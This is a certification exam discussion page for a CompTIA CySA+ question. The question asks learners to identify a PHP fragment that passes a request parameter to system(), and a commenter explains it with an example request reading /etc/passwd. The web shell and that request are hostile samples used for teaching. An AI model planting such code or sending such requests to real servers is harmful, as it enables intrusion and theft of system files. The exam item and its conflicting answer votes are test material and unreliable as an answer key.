ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam CS0-003 All Questions

View all questions & answers for the CS0-003 exam
Go to Exam

Exam CS0-003 topic 1 question 329 discussion

Actual exam question from CompTIA's CS0-003
Question #: 329
Topic #: 1
[All CS0-003 Questions]

An analyst has discovered the following suspicious command:

"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>

Which of the following would best describe the outcome of the command?

  • A. Cross-site scripting
  • B. Reverse shell
  • C. Backdoor attempt
  • D. Logic bomb
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️
by ada26b1 at March 30, 2025, 2:56 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
srtysrhtyjumnuyedt
6 days, 6 hours ago
Selected Answer: C
This php command essentially tells the server to retrieve input from an HTTP request with xyz as the key and execute any arbitrary command input into that xyz key. The "echo ""; die;" tells the server to only send back output from the command, stripping away any web page content. If this is successfully executed, the attacker could send a request at any time such as "https://example.com/example.php?xyz=cat+/etc/passwd" and the server would reveal the contents of the passwd file. This is effectively a RCE backdoor
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago